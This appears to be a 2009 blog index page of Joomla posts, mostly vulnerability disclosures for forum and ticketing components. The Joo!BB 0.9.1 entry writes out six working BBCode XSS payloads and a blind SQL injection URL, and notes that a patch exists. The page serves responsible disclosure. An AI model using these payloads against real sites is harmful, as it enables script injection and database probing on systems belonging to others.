jeffchannell.com

Shameless Google Plug

Posted in Joomla!
2009-08-11 13:58:50 +0000 UTC
Google Search: joomla JFormValidator. Did you mean google FormValidator?

Validate Custom Administrator Form

Posted in Joomla!
2009-08-10 20:20:08 +0000 UTC

I've been working on a custom Joomla component for a client at work, and needed to validate that certain aspects of the admin form. I could have recreated the wheel and written my own validation routine, but I really wanted to use Joomla's core validation behavior. What follows is how I managed to validate a form when submitted using the core Joomla toolbar buttons.

Interview at CMSWire

Posted in Joomla!
2009-08-03 21:42:27 +0000 UTC
As I reported earlier, I was interviewed in the not too recent past concerning XSS security and Joomla. I am proud to say that the interview has been posted on CMSWire, with a prominent back link to yours truly in the first paragraph!
The whole interview can be read here.

Joo!BB 0.9.1 Multiple Vulnerabilities

Posted in Joomla!
2009-08-01 05:00:00 +0000 UTC

The Joomla component Joo!BB 0.9.1 suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as Blind SQL Injection in its search feature.

  1. Nested [img] XSS

    [img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
  2. Nested [url] XSS

    [url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
  3. BBCode [color] Tag Injection

    [color=#ff0000;font-size:100px;]XSS[/color]
  4. BBCode [url] Location XSS

    [url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]
  5. BBCode [font] Tag Injection

    [font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]
  6. BBCode [table] Tag XSS

    [table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onclick='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]
  7. Blind SQL Injection

    /index.php?tmpl=component&option=com_joobb&view=search&searchwords=%' and SUBSTRING(@@version,1,1)=5 -- '
    If MySQL is version 5, this will return results. Otherwise, no results.
These vulnerabilities have been patched and users are strongly urged to update to 0.9.1 Patch 1

Timeline

Agora 3.0.0 RC1 Rev.4 XSS Vulnerability

Posted in Joomla!
2009-07-16 17:04:45 +0000 UTC

The Joomla component Agora 3.0.0 RC1 Rev.4 suffers from a Persistent XSS vulnerability. This can be exploited by uploading a malicious SWF file as an attachment then embedding it using the [swf] BBCode tag from the local server, thus bypassing any crossdomain policy.

JTag Ticketing System Persistent XSS Vulnerability

Posted in Joomla!
2009-07-12 04:37:23 +0000 UTC

Well, another XSS vulnerable BBCode implementation, this time on JTag Ticketing System. This is the exact same vulnerability I posted about earlier concerning WebAmoeba.

uddeIM BBCode XSS Vulnerability

Posted in Joomla!
2009-07-10 15:34:51 +0000 UTC

The Joomla component uddeIM is vulnerable to XSS injection in its BBCode implementation. Extra CSS parameters can be passed inside the [color] tag, and Internet Explorer versions before 8 will run scripts using the 'expression()' CSS function.

Kunena Forums Persistent XSS Vulnerability

Posted in Joomla!
2009-07-06 20:06:24 +0000 UTC

Here's a rather nasty persistent XSS vulnerability I found today in Kunena Forums. Using nested [img] tags, it is possible to inject script into the forums.

WebAmoeba Ticket System 3.0.0 BBcode XSS

Posted in Joomla!
2009-07-03 20:31:48 +0000 UTC

I found a nice little exploit for WebAmoeba Ticket System 3.0.0, a Joomla help desk component. The vulnerability is with the BBCode library used to parse BBCode tags, as it does not strip javascript: urls from [url] tags.

Quick-Install Joomla on 1&1 Hosting

Posted in Joomla!
2009-07-03 15:16:11 +0000 UTC

A friend of mine was installing Joomla on his 1&1 hosting account, and the FTP transfer was taking forever. I told him I could probably write a script, upload it, and run it and have Joomla ready to be installed faster than his FTP transfer would take. Sure enough, it worked. Here's how: